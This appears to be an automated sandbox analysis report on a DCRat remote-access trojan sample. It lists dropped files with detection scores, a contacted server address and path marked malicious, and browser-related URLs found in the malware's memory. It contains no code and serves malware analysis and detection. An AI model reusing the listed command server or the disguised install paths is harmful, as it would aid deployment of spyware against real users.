C:\Users\user\Desktop\FCNjSRns.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\RGKyyyvv.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\FnLRHIfV.log	100%	Joe Sandbox ML
C:\Users\Public\Libraries\dllhost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	100%	Joe Sandbox ML
C:\Recovery\fontdrvhost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\IYriOWqO.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\WJeOmDSH.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\AHMSLlxy.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\TYzyfqIO.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\PTahnXzX.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\FCNjSRns.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\PVfhrllC.log	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\fontdrvhost.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Libraries\dllhost.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AHMSLlxy.log	5%	ReversingLabs
C:\Users\user\Desktop\DOJbgDru.log	29%	ReversingLabs
C:\Users\user\Desktop\FCNjSRns.log	25%	ReversingLabs
C:\Users\user\Desktop\FdoRXWMY.log	12%	ReversingLabs
C:\Users\user\Desktop\FnLRHIfV.log	17%	ReversingLabs
C:\Users\user\Desktop\GzproQCn.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HpyAdrkQ.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\IYriOWqO.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KpfivNCg.log	25%	ReversingLabs
C:\Users\user\Desktop\MRnySouc.log	21%	ReversingLabs
C:\Users\user\Desktop\PTahnXzX.log	16%	ReversingLabs
C:\Users\user\Desktop\PVfhrllC.log	21%	ReversingLabs
C:\Users\user\Desktop\QALqtMNE.log	21%	ReversingLabs
C:\Users\user\Desktop\QiIHXtHV.log	8%	ReversingLabs
C:\Users\user\Desktop\RGKyyyvv.log	17%	ReversingLabs
C:\Users\user\Desktop\TYzyfqIO.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\UJxgUhAr.log	8%	ReversingLabs
C:\Users\user\Desktop\VVaGAqXJ.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\WJeOmDSH.log	8%	ReversingLabs
C:\Users\user\Desktop\XxiWXROF.log	25%	ReversingLabs
C:\Users\user\Desktop\YwOfwePf.log	29%	ReversingLabs
C:\Users\user\Desktop\ZRcXHVNC.log	17%	ReversingLabs
C:\Users\user\Desktop\bYXvUFHb.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eEtWkScq.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\gsyeVgYo.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\hZjnbUmV.log	16%	ReversingLabs
C:\Users\user\Desktop\haXUgXfM.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\hiGnLHFR.log	5%	ReversingLabs
C:\Users\user\Desktop\iObdSlbK.log	4%	ReversingLabs
C:\Users\user\Desktop\jzvnrySk.log	21%	ReversingLabs
C:\Users\user\Desktop\kfPdycnc.log	17%	ReversingLabs
C:\Users\user\Desktop\lQNLnUfF.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\onNmUvhY.log	8%	ReversingLabs
C:\Users\user\Desktop\sOBLQjau.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\sVUKwIHM.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\tCFTCxVs.log	25%	ReversingLabs
C:\Users\user\Desktop\tRHlMFdP.log	12%	ReversingLabs
C:\Users\user\Desktop\uOjtiFsK.log	4%	ReversingLabs
C:\Users\user\Desktop\vEsBXgan.log	8%	ReversingLabs
C:\Users\user\Desktop\wnljJKgl.log	8%	ReversingLabs
C:\Users\user\Desktop\ygASuHSj.log	25%	ReversingLabs
C:\Users\user\Desktop\ypXSetlg.log	25%	ReversingLabs
C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://91.227.41.9	0%	Avira URL Cloud	safe
http://91.227.41.9/	0%	Avira URL Cloud	safe
http://91.227.41.9/imagePipepolldletemp.php	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://91.227.41.9/imagePipepolldletemp.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	RyroOfX8Xr.5.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.fontbureau.com/designers/?	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.fontbureau.com/designers?	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.227.41.9/	dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.227.41.9	dllhost.exe, 00000005.00000002.4103094451.000000000342D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.tiro.com	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.fontbureau.com/designers	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	dllhost.exe, 00000005.00000002.4116814667.0000000014695000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137A9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001394E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139DA000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137EF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001387C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013A20000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014839000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001457D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013994000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001450A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001464F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138C2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001447E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000144C4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145C3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013836000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014609000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014721000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147AD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	dllhost.exe, 00000005.00000002.4116814667.0000000014695000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137A9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001394E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139DA000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137EF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001387C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013A20000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014839000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001457D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013994000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001450A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001464F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138C2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001447E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000144C4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145C3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013836000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014609000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014721000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147AD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	RyroOfX8Xr.5.dr	false		high
http://www.carterandcone.coml	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	dllhost.exe, 00000005.00000002.4116814667.0000000013097000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000134B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001427F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000140F4000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001314C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001443A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013F85000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F0C000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001403F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013182000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001413E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001356A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000141CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000142F6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013ED1000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000012F62000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013C08000.00000004.00000800.00020000.00000000.sdmp, 7xw9K0Vs4e.5.dr, XJq0wWYSge.5.dr, FZwLUNHu3n.5.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	dllhost.exe, 00000005.00000002.4155323854.000000001F732000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	dllhost.exe, 00000005.00000002.4116814667.00000000144E5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014744000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001396F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001449F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014670000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000138E3000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000137CB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139B5000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013785000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014789000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001389D000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000014815000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000147CF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000139FB000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001462A000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000146FC000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013811000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.0000000013929000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.000000001459E000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4116814667.00000000145E4000.00000004.00000800.00020000.00000000.sdmp	false		high
